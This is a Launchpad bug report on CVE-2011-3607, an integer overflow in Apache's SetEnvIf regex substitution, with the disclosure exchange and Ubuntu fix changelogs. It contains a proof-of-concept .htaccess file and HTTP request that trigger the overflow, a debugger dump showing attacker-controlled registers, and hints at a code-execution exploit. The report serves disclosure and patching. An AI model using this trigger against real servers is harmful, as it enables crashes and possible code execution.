Exploitable integer overflow on x86 in mod SetEnvIf, leading to buffer overwrite
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
| apache2 (Ubuntu) |
Low
|
Unassigned | ||
| Hardy |
Low
|
Marc Deslauriers | ||
| Lucid |
Low
|
Marc Deslauriers | ||
| Maverick |
Low
|
Marc Deslauriers | ||
| Natty |
Low
|
Marc Deslauriers | ||
| Oneiric |
Low
|
Marc Deslauriers | ||
| Precise |
Low
|
Unassigned |
Bug Description
Apache worker on oneric, in server/util.c, function
AP_DECLARE(char *) ap_pregsub(
contains exploitable integer overflow when calculating length of
buffer:
else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
len += pmatch[no].rm_eo - pmatch[no].rm_so;
}
...
dest = dst = apr_pcalloc(p, len + 1);
Can be triggered by placing .htaccess file on server with module
enabled:
SetEnvIf MyRequest "^(.*)$"
TestVar=
SetEnvIf TestVar "^(.*)$"
Test2Var=
SetEnvIf Test2Var "^(.*)$"
Test3Var=
SetEnvIf Test3Var "^(.*)$"
Test4Var=
Testrequest:
GET /test/file HTTP/1.1
Host: localhost
MyRequest: 0123456789ABCDE
Connection: close
Result: Allocates 2^6 * 2^6 * 2^6 * 2^6 * 2^8 + 1 = 2^32 + 1 bytes via
apr_pcalloc
Add some slack using "0123456789abcde" at end of expression to select if
else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
len = pmatch[no].rm_eo - pmatch[no].rm_so;
dst += len;
}
or while-loop around memcpy should segfault, usually at
if (no > 9) { /* Ordinary character. */
if (c == '\\' && (*src == '$' || *src == '&'))
c = *src++;
*dst++ = c;
}
Ubuntu security was informed 20110715, no reply so far. When .htaccess was placed on server, exploitation seems to be possible on nonexec segments using 2 concurrent client requests over net. With return-
0 0x002cb36b in apr_brigade_cleanup () from /usr/lib/
esi 0x46464646 1179010629
0x002cb350 <+0>: push %ebp
0x002cb351 <+1>: push %edi
0x002cb352 <+2>: push %esi
0x002cb353 <+3>: sub $0x10,%esp
0x002cb356 <+6>: mov 0x20(%esp),%edi
0x002cb35a <+10>: mov 0x4(%edi),%eax
0x002cb35d <+13>: lea 0x4(%edi),%ebp
0x002cb360 <+16>: cmp %ebp,%eax
0x002cb362 <+18>: je 0x2cb393 <apr_brigade_
0x002cb364 <+20>: lea 0x0(%esi,
0x002cb368 <+24>: mov 0x4(%edi),%esi -- user controlable
=> 0x002cb36b <+27>: mov 0x4(%esi),%eax
0x002cb36e <+30>: mov (%esi),%edx
0x002cb370 <+32>: mov %edx,(%eax) -- (esi) to (esi+4)
0x002cb372 <+34>: mov (%esi),%eax
0x002cb374 <+36>: mov 0x4(%esi),%edx
0x002cb377 <+39>: mov %edx,0x4(%eax) -- (esi+4) to ((esi)+4)
0x002cb37a <+42>: mov 0x8(%esi),%eax
0x002cb37d <+45>: mov 0x18(%esi),%edx -- 0x18 value to stack
0x002cb380 <+48>: mov %edx,(%esp)
0x002cb383 <+51>: call *0xc(%eax)
where esi is user controllable and can be made pointing to other user-data blocks. The symlink attack from
http://
# lsb_release -rd
Description: Ubuntu oneiric (development branch)
Release: 11.10
# apt-cache policy apache2-mpm-worker
apache2-mpm-worker:
Installed: 2.2.19-1ubuntu1
Candidate: 2.2.19-1ubuntu1
Version table:
*** 2.2.19-1ubuntu1 0
500 http://
100 /var/lib/
halfdog (halfdog) wrote : | #1 |
Marc Deslauriers (mdeslaur) wrote : | #2 |
Thanks for reporting this issue.
Could you please report this issue to the Apache Security Team, and possibly link the resulting bug report here.
Thanks.
Changed in apache2 (Ubuntu): | |
importance: | Undecided → Low |
Marc Deslauriers (mdeslaur) wrote : | #3 |
See here for information on reporting this issue:
http://
Jamie Strandboge (jdstrand) wrote : | #4 |
What was the response from upstream?
Changed in apache2 (Ubuntu): | |
assignee: | nobody → Jamie Strandboge (jdstrand) |
status: | New → Incomplete |
halfdog (halfdog) wrote : | #5 |
Sent mail to <email address hidden> 2011-07-15 (no reply) and again today:
Dear Apache Httpd Security Team,
It seems possible to execute arbitrary via the bug reported
2011-07-15. Since this requires a crafted .htaccess file on the host,
this might not be a too big issue.
See
http://
for first draft of multi-thread exploit (url not published elsewhere).
Currently I'm trying to get more stable code executing using the
stop-regex approach and just a single thread.
I checked the reporting guidelines again today and found, that there is a different security contact mail address mentioned. I'm not sure, if something has changed at apache website or I just picked up an dead address. Resending to <email address hidden>
halfdog (halfdog) wrote : | #6 |
Got reply from apache-security, request to create advisory.
Updated bug information, placed a advisory-stub at http://
halfdog (halfdog) wrote : | #7 |
Information Joe Orton:
We'd prefer to discuss the appropriate fix for this on the public
mailing list, so could you publish your advisory as soon as is
convenient. We'll follow up with public discussion and patches as
appropriate.
Please use the CVE name CVE-2011-3607 for this issue.
Very good discussion:
visibility: | private → public |
halfdog (halfdog) wrote : | #8 |
CVE-2011-3607 is fixed upstream in trunk, but not yet released: http://
Another CVE-2011-4415 was assigned by mitre to the resource consumption, NULL-dereference issue
Changed in apache2 (Ubuntu Hardy): | |
status: | New → Confirmed |
Changed in apache2 (Ubuntu Lucid): | |
status: | New → Confirmed |
Changed in apache2 (Ubuntu Maverick): | |
status: | New → Confirmed |
Changed in apache2 (Ubuntu Natty): | |
status: | New → Confirmed |
Changed in apache2 (Ubuntu Oneiric): | |
status: | New → Confirmed |
Changed in apache2 (Ubuntu Precise): | |
status: | Incomplete → Fix Released |
assignee: | Jamie Strandboge (jdstrand) → nobody |
Changed in apache2 (Ubuntu Hardy): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
Changed in apache2 (Ubuntu Lucid): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
Changed in apache2 (Ubuntu Maverick): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
Changed in apache2 (Ubuntu Oneiric): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
Changed in apache2 (Ubuntu Natty): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
Changed in apache2 (Ubuntu Hardy): | |
importance: | Undecided → Low |
Changed in apache2 (Ubuntu Lucid): | |
importance: | Undecided → Low |
Changed in apache2 (Ubuntu Maverick): | |
importance: | Undecided → Low |
Changed in apache2 (Ubuntu Oneiric): | |
importance: | Undecided → Low |
Changed in apache2 (Ubuntu Natty): | |
importance: | Undecided → Low |
Launchpad Janitor (janitor) wrote : | #9 |
This bug was fixed in the package apache2 - 2.2.20-1ubuntu1.2
---------------
apache2 (2.2.20-1ubuntu1.2) oneiric-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service via invalid cookie
- debian/
modules/
- CVE-2012-0021
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 09:35:36 -0500
Launchpad Janitor (janitor) wrote : | #10 |
This bug was fixed in the package apache2 - 2.2.17-1ubuntu1.5
---------------
apache2 (2.2.17-1ubuntu1.5) natty-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service via invalid cookie
- debian/
modules/
- CVE-2012-0021
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:02:26 -0500
Launchpad Janitor (janitor) wrote : | #11 |
This bug was fixed in the package apache2 - 2.2.16-1ubuntu3.5
---------------
apache2 (2.2.16-1ubuntu3.5) maverick-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:11:29 -0500
Launchpad Janitor (janitor) wrote : | #12 |
This bug was fixed in the package apache2 - 2.2.14-5ubuntu8.8
---------------
apache2 (2.2.14-5ubuntu8.8) lucid-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:36:43 -0500
Launchpad Janitor (janitor) wrote : | #13 |
This bug was fixed in the package apache2 - 2.2.8-1ubuntu0.23
---------------
apache2 (2.2.8-1ubuntu0.23) hardy-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:49:11 -0500
Changed in apache2 (Ubuntu Hardy): | |
status: | Confirmed → Fix Released |
Changed in apache2 (Ubuntu Lucid): | |
status: | Confirmed → Fix Released |
Changed in apache2 (Ubuntu Maverick): | |
status: | Confirmed → Fix Released |
Changed in apache2 (Ubuntu Natty): | |
status: | Confirmed → Fix Released |
Changed in apache2 (Ubuntu Oneiric): | |
status: | Confirmed → Fix Released |
Read proc/<pid>/maps due to timerace https:/ /bugs.launchpad .net/ubuntu/ +source/ apache2/ +bug/811428 . Since attacker must have been able to place .htaccess on server, he might be able to place a symlink also.